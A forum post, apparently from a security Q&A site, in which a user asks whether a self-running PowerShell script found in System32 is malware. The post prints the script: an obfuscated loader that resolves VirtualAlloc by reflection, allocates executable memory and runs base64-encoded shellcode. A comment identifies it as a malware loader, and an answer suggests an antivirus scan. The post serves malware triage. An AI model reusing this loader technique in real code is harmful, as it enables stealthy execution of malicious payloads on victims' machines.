# What does this PowerShell script do? Is it malware? It auto-runs itself on my computer

Tags: windows, powershell, malware

I found this script by tracing the command-line parameters of the process via procexp. It is located at C:\Windows\System32\8208c741-a361-4e21-83e2-6d7f9a3b5b89.ps1 and somehow runs itself periodically (no idea how, I'm not familiar with PS).

The very start of the script contains some very long strings preceded by `$dat +=`, which can be seen in [this pastebin](https://pastes.io/e7hlkvqhr7).

```
$assemblies = New-Object -TypeName System.Collections.Generic.Dictionary'[string, System.Reflection.Assembly]' -ArgumentList ([StringComparer]::OrdinalIgnoreCase)
foreach ($assembly in ([AppDomain]::CurrentDomain.GetAssemblies())) {
    $assemblies[[System.IO.Path]::GetFileName($assembly.Location)] = $assembly;
}

function Get-Ptr {
    param (
        [IntPtr]
        $ptr,
        [type[]]
        $params,
        [type]
        $rettype
    )
    $bu = [AppDomain]::CurrentDomain.DefineDynamicAssembly([System.Reflection.AssemblyName]::new(('_' + [guid]::NewGuid().ToString())), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(('_' + [guid]::NewGuid().ToString()), $false).DefineType(('_' + [guid]::NewGuid().ToString()), 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate]);
    $bu.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $params).SetImplementationFlags('Runtime, Managed');
    $bu.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $rettype, $params).SetImplementationFlags('Runtime, Managed');
    $del = $bu.CreateType();
    return [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ptr, $del);
}

function Get-Func {
    param (
        [string]
        $module,
        [string]
        $name,
        [type[]]
        $params,
        [type]
        $rettype
    )
    $na = $assemblies['System.dll'].GetType(('Microsoft' + '.Win32.' + 'UnsafeN' + 'ativeMethods'));
    $gp = $na.GetMethod('GetProcAddress', [Type[]] @('System.Runtime.InteropServices.HandleRef', 'string'));
    $md = $na.GetMethod('GetModuleHandle').Invoke($null, @($module));
    $ptr = $gp.Invoke($null, @(([System.Runtime.InteropServices.HandleRef]::new([object]::new(), $md)), $name));
    return Get-Ptr $ptr $params $rettype;
}

$fname = 'V';
$fname += 'i';
$fname += 'r';
$fname += 't';
$fname += 'u';
$fname += 'a';
$fname += 'l';
$fname += 'A';
$fname += 'l';
$fname += 'l';
$fname += 'o';
$fname += 'c';
$func = Get-Func 'Kernel32.dll' $fname @([IntPtr], [IntPtr], [uint32], [uint32]) ([IntPtr]);

$dat = [Convert]::FromBase64String($dat);
$patch = $func.Invoke(0, 8208, 12288, 64);
[Runtime.InteropServices.Marshal]::Copy($dat, 0, $patch, 8208);
$patchfunc = Get-Ptr $patch @([uint32], [IntPtr], [IntPtr], [IntPtr]) ([IntPtr]);
$patch2 = [Runtime.InteropServices.Marshal]::AllocHGlobal(95232);
[Runtime.InteropServices.Marshal]::Copy($dat, 8208, $patch2, 95232);
$patchfunc.Invoke(0, $patch2, 1, 0);

while($true)
{
    Start-Sleep 10
}
```

After running it appears to interact in some way with .sys files under System32\drivers\VwA5N1xq4w and System32\drivers\4mscxjme2;

All these files contain is a long litany of lines like this:

```
08/23/2021 00:24:32.582 [506]: Failed to load dependency Microsoft.AnalysisServices.AdomdClient of assembly Microsoft.ReportingServices.DataExtensions, Version=2020.13.0.0, Culture=neutral, PublicKeyToken=89845dcd8080cc91 because of the following error : Die gefundene Manifestdefinition der Assembly stimmt nicht mit dem Assemblyverweis überein. (Ausnahme von HRESULT: 0x80131040
08/23/2021 00:24:32.582 [507]: Failed to load dependency Microsoft.AnalysisServices.AdomdClient of assembly Microsoft.ReportingServices.DataExtensions, Version=2020.13.0.0, Culture=neutral, PublicKeyToken=89845dcd8080cc91 because of the following error : Die gefundene Manifestdefinition der Assembly stimmt nicht mit dem Assemblyverweis überein. (Ausnahme von HRESULT: 0x80131040
```

Comment: Looks like a malware loader/cradle. No legitimate piece of software would go to this level of static evasion

Answer (score 3):

This script seems to have a specific purpose, and its behavior may be part of a larger system or malware.
Try to run an antivirus scan.